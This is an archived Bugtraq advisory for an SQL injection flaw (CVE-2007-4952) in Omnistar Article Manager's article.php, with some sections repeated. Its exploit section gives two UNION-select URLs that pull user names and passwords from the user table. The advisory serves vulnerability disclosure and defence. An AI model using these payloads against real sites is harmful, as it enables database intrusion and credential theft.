Omnistar Article Manager Article.PHP SQL Injection Vulnerability
BID:25692
Info
Omnistar Article Manager Article.PHP SQL Injection Vulnerability
| Bugtraq ID: | 25692 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-4952 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 17 2007 12:00AM |
| Updated: | May 07 2015 05:35PM |
| Credit: | Cold z3ro is credited with the discovery of this vulnerability. |
| Vulnerable: |
OmniStar Article OmniStar Article 0 |
| Not Vulnerable: | |
Discussion
Omnistar Article Manager Article.PHP SQL Injection Vulnerability
Omnistar Article Manager is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Omnistar Article Manager is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Exploit / POC
Omnistar Article Manager Article.PHP SQL Injection Vulnerability
Attackers can exploit this issue via a browser.
The following example URIs are available:
http://www.example.com/article.php?op=favorite&article_id=4&page_id=-1'/**/union/**/select/**/name,1/**/from/**/user/*
http://www.example.com/article.php?op=favorite&article_id=4&page_id=-1'/**/union/**/select/**/password,1/**/from/**/user/
The following proof-of-concept example is available:
Attackers can exploit this issue via a browser.
The following example URIs are available:
http://www.example.com/article.php?op=favorite&article_id=4&page_id=-1'/**/union/**/select/**/name,1/**/from/**/user/*
http://www.example.com/article.php?op=favorite&article_id=4&page_id=-1'/**/union/**/select/**/password,1/**/from/**/user/
The following proof-of-concept example is available:
Solution / Fix
Omnistar Article Manager Article.PHP SQL Injection Vulnerability
Solution:
The vendor has released fixes. Please contact the vendor for information on how to obtain and apply the latest version.
Solution:
The vendor has released fixes. Please contact the vendor for information on how to obtain and apply the latest version.
References
Omnistar Article Manager Article.PHP SQL Injection Vulnerability
References:
References:
- Omnistar Article Web Site (Omnistar Article)